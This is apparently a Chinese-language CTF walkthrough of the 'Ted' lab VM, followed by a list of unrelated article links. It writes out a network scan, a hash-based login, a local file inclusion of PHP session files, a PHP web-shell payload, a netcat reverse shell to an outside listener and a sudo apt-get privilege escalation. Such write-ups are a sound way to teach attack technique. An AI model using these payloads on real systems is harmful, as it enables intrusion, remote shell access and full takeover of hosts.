当前位置: 首页 > news >正文

Ted靶机设置

news 来源:原创 2024/9/21 8:31:03

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机ip为192.168.112.144

目录扫描

dirsearch 192.168.112.144

访问浏览器

尝试弱口令登陆,发现失败

BP抓包查看

发现需要hash加密

对admin进行hash加密

转化大写后8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

登陆成功

文件包含

尝试提交 ../../../../../../../../etc/passwd

发现存在文件包含漏洞

尝试包含用来存储用户session的文件,从而获取shell

抓取一个有session的请求包,拿到session

phpsessid:peuds21gpjljvnbk5hb6udq6j2

搜索框输入

/var/lib/php/sessions/sess_peuds21gpjljvnbk5hb6udq6j2

getshell

测试RCE是否存在

修改user pref:%3C%3Fphp%20system(%24_POST%5B%22cmd%22%5D)%3B%20%3F%3E

发现命令成功执行

开启监听

写入反弹shell

nc+192.168.112.130+9999+-e+/bin/bash

监听成功,拿到shell

提权

生成交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l查看免密操作

尝试sudo提权

sudo apt-get changelog apt

!/bin/sh

提权成功

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • AI浪潮下的教育革新:把握机遇,拥抱变化!
  • Qt 0814作业
  • Eureka原理与实践:深入探索微服务架构的核心组件
  • Java虚拟机:类的加载机制
  • 智慧安防/一网统管/视频监控EasyCVR视频汇聚平台的视频轻量化特点及应用
  • 随手记录第十四话 -- 在 Spring Boot 3.2.3 中使用 springdoc-openapi-starter-webmvc-ui
  • Vue项目封装请求路径
  • 【Vue-video】Video 封装组件-Copy直接用解决封装BUG
  • 作为web3D的核心,webGL会被webGPU取代吗?
  • 视频汇聚/安防综合管理系统EasyCVR非管理员账户能调用分配给其他用户的通道是什么原因?
  • Ps:首选项 - 增效工具
  • 【STM32实物】基于STM32+ESP32+手机APP设计的智能宠物喂食系统实物源码原理图PCB设计文档演示视频——(文末工程资料下载)
  • 在C++中实现一个简单的图像处理库
  • 【开端】如何高效记录并整理编程学习笔记
  • C++ 11相关新特性(lambda表达式与function包装器)
  • JavaScript-如何实现克隆(clone)函数
  • “大数据应用场景”之隔壁老王(连载四)
  • 【笔记】你不知道的JS读书笔记——Promise
  • 【知识碎片】第三方登录弹窗效果
  • android高仿小视频、应用锁、3种存储库、QQ小红点动画、仿支付宝图表等源码...
  • Angular js 常用指令ng-if、ng-class、ng-option、ng-value、ng-click是如何使用的?
  • Angular4 模板式表单用法以及验证
  • Golang-长连接-状态推送
  • Java编程基础24——递归练习
  • MQ框架的比较
  • Spring Cloud Feign的两种使用姿势
  • vue+element后台管理系统,从后端获取路由表,并正常渲染
  • webpack+react项目初体验——记录我的webpack环境配置
  • 初识MongoDB分片
  • 手写双向链表LinkedList的几个常用功能
  • 一、python与pycharm的安装
  • 直播平台建设千万不要忘记流媒体服务器的存在 ...
  • #if 1...#endif
  • #LLM入门|Prompt#3.3_存储_Memory
  • #我与Java虚拟机的故事#连载16:打开Java世界大门的钥匙
  • (1)(1.13) SiK无线电高级配置(五)
  • (11)MSP430F5529 定时器B
  • (2)Java 简介
  • (2024.6.23)最新版MAVEN的安装和配置教程(超详细)
  • (ZT)薛涌:谈贫说富
  • (超详细)语音信号处理之特征提取
  • (代码示例)使用setTimeout来延迟加载JS脚本文件
  • (非本人原创)我们工作到底是为了什么?​——HP大中华区总裁孙振耀退休感言(r4笔记第60天)...
  • (黑客游戏)HackTheGame1.21 过关攻略
  • (十六)视图变换 正交投影 透视投影
  • (微服务实战)预付卡平台支付交易系统卡充值业务流程设计
  • (一)eclipse Dynamic web project 工程目录以及文件路径问题
  • (一)python发送HTTP 请求的两种方式(get和post )
  • (转)PlayerPrefs在Windows下存到哪里去了?
  • .helper勒索病毒的最新威胁:如何恢复您的数据?
  • .NET BackgroundWorker
  • .NET Core跨平台微服务学习资源
  • .NET LINQ 通常分 Syntax Query 和Syntax Method
  • .Net mvc总结
  • .NET开发不可不知、不可不用的辅助类(一)